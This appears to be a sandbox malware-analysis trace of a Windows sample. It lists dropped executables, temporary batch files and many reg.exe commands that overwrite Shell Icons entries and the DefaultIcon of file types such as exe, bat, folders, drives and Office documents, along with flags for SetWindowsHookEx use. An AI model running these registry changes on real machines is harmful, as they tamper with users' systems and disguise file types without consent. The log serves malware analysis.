reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 72 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6076

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 73 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3640

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 74 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1092

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 75 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3104

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 76 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4908

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:2168

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 78 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5184

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 79 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:2480

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 80 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1308

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 81 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5284

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 82 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4180

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 83 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:3036

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 84 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5724

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 85 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4760

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 86 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1260

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 87 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5888

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 88 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5964

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 89 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2680

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 90 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2904

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 91 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1920

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 92 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5660

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 93 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6024

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 94 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5288

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 95 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4568

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 96 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6120

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 97 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5512

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 98 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:740

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 99 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4836

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 100 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1352

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 101 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5740

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 102 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:404

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 103 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5424

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 104 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3996

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 105 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:1932

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 106 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:392

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 107 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4768

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 108 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:472

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 109 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:2728

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 110 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3644

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 111 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:3488

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 112 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:6076

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 113 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:636

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 114 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3948

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 115 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4784

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 116 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5604

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 117 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6080

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 118 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4316

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 119 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3224

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 120 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4612

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 121 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1668

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 122 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5996

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 123 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:308

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 124 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2248

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 125 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4760

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 126 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5964

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 127 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:2680

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 128 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4604

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 129 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:1908

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 130 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:6024

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 131 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4252

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 132 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5700

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 133 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:3148

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 134 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5304

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 135 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:4104

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 136 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2660

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 137 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5860

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 138 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:3068

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 139 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4476

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 140 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:2112

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 141 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:6052

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 142 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:5556

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 143 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5480

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 144 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:5532

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 145 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4664

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 146 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:2940

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 147 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4080

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 148 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:3576

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 149 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
PID:472

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 150 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
11⤵
- Modifies File Icons
PID:4280

C:\java\protection\start\starticons.exe
C:\java\protection\start\starticons.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5872

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\81ED.tmp\81EE.tmp\81EF.bat C:\java\protection\start\starticons.exe"
8⤵
PID:1668

C:\java\protection\icons.exe
C:\java\protection\icons.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1464

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\83A3.tmp\83A3.tmp\83A4.bat C:\java\protection\icons.exe"
10⤵
PID:5512

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
- Modifies system executable filetype association
PID:4232

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:2556

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\batfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
- Modifies system executable filetype association
PID:3268

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\blendfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
- Modifies registry class
PID:6108

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\dllfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:3472

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\AutoHotkeyScript\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:4348

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\pngfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:2424

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\jpegfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:280

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\giffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
- Modifies registry class
PID:6068

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\bittorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
- Modifies registry class
PID:3180

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\cmdfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
- Modifies registry class
PID:5792

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\dbfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:4908

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Drive\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:6028

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\DVD\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:5888

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\docxfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:4612

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:1668

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\http\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:5392

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:4032

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Folder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
- Modifies registry class
PID:6044

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\https\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
- Modifies registry class
PID:1920

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\icofile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:5704

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:5028

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\mscfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:1776

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-excel\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:288

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-publisher\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:2376

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-word\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:6052

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-access\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:3644

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\MSInfoFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:5988

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Python.File\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:3236

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\regfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:5568

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\steamlink\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:5856

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\steam\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\4.ico" /f
11⤵
PID:1668

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\svgfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:6120

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\themefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:1916

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\themepackfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:5044

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:1044

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\xmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:3240

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\WinRAR\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:3576

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Windows.VhdFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:404

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\SearchFolder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
- Modifies registry class
PID:1932

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
11⤵
PID:5876

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:5124

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\inffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:472

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\JSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:648

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\JSEFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
PID:4024

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ftp\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:3180

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:3104

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Word.Document.12\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:1880

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Word.RTF.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:5980

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:3284

